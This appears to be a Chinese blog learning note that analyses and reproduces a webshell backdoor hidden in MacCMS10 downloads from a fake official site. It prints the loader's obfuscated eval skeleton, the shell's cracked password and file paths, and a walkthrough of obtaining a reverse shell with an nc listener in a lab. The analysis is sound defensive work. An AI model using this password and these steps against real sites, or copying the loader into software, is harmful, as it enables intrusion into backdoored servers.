（本文僅為平時(shí)學(xué)習(xí)記錄，若有錯(cuò)誤請(qǐng)大佬指出，如果本文能幫到你那我也是很開(kāi)心啦）

該復(fù)現(xiàn)參考網(wǎng)絡(luò)中的文章，該漏洞復(fù)現(xiàn)僅僅是為了學(xué)習(xí)交流，嚴(yán)禁非法使用！！！

一、事件背景

Maccms網(wǎng)站：基于PHP+MYSQL環(huán)境下運(yùn)行的完善而強(qiáng)大的快速建站系統(tǒng)，最近Tools上有人曝出有一個(gè)冒充了蘋(píng)果CMS官網(wǎng)的網(wǎng)站提供的MacCMS10存在后門(mén)，冒充網(wǎng)站http://www.maccmsv10.com/download.html

cms：內(nèi)容管理系統(tǒng)

二、漏洞分析

1.在冒充的“蘋(píng)果官網(wǎng)”下載MacCMS10版本后，打開(kāi)源碼，找到maccms10.zipextendQcloudSmsSms.php、maccms10.zipextendupyunsrcUpyunApiFormat.php

其中Smsphp和Format.php的后門(mén)木馬是一樣的，找出一個(gè)進(jìn)行分析

 1 <?php
 2 error_reporting(E_ERROR);//報(bào)錯(cuò)
 3 @ini_set('display_errors','Off');//做初始化環(huán)境
 4 @ini_set('max_execution_time',20000);
 5 @ini_set('memory_limit','256M');
 6 header("content-Type: text/html; charset=utf-8");//設(shè)置編碼
 7 $password = "0d41c75e2ab34a3740834cdd7e066d90";//32位，MD5加密的密碼，解密后為：WorldFilledWithLove
 8 function s(){
 9     $str = "編碼之后的惡意代碼";
10     $str = str_rot13($str);//對(duì)惡意代碼進(jìn)行ROT13編碼
11     m($str);
12 }
13 function m($str){
14     global $password;//全局變量
15     $jj = '';
16     eval($jj.pack('H*',$str).$jj);//對(duì)混淆的PHP代碼進(jìn)行解碼（使用的是pack函數(shù)），解碼之后的代碼進(jìn)行eval函數(shù)的解析
17 }
18 s();//調(diào)用s函數(shù)
19 ?>

執(zhí)行下面的代碼即可看到PHP+HTML編寫(xiě)的惡意代碼

1 <?php
2 $str = "編碼之后的惡意代碼";
3 $str = str_rot13($str);
4 echo pack('H*',$str);

2.將網(wǎng)站源碼移動(dòng)到PhpStudy的Web根目錄下，打開(kāi)PhpStudy，開(kāi)啟Apache服務(wù)，使用密碼訪問(wèn)

http://127.0.0.1/maccms10/extend/upyun/src/Upyun/Api/Format.php或http://127.0.0.1/maccms10/extend/Qcloud/Sms/Sms.php，可以看到以下界面，使用解密之后的密碼WorldFilledWithLove進(jìn)行登錄

這里我單獨(dú)將有后門(mén)的文件直接移動(dòng)到了Web根目錄下，訪問(wèn)的地址就為127.0.0.1/Format.php

點(diǎn)擊#Login進(jìn)入以下界面

3.由上圖可以看到，這是個(gè)大馬，即有很多功能的木馬，如，執(zhí)行SQL、執(zhí)行命令、反彈端口等，對(duì)其中幾個(gè)功能進(jìn)行測(cè)試

4.測(cè)試反彈端口，使用Kali虛擬機(jī)作為攻擊者，本地機(jī)作為靶機(jī)

填完反彈地址和端口后不要點(diǎn)擊反彈，反彈地址為Kali的IP

5.打開(kāi)Kali，使用NC監(jiān)聽(tīng)后，點(diǎn)擊反彈

1 nc -lvvp 7777  開(kāi)啟監(jiān)聽(tīng)端口7777
2     l  本地
3     vv  詳細(xì)信息
4     p  端口

點(diǎn)擊反彈后，就可以獲得靶機(jī)的shell，輸入系統(tǒng)命令進(jìn)行測(cè)試，復(fù)現(xiàn)成功！！！

反彈shell：將目標(biāo)機(jī)上的終端或解析器或者shell反彈到攻擊者的電腦中，需要攻擊者提前監(jiān)聽(tīng)端口

6.使用NC監(jiān)聽(tīng)，不穩(wěn)定，很容易關(guān)閉監(jiān)聽(tīng)，這時(shí)再次打開(kāi)瀏覽器，就會(huì)發(fā)現(xiàn)報(bào)錯(cuò)信息，這個(gè)就是error_reporting(E_ERROR);命令所報(bào)的錯(cuò)誤

總結(jié)

以上是生活随笔為你收集整理的【漏洞复现】Maccms潜藏后门分析复现的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。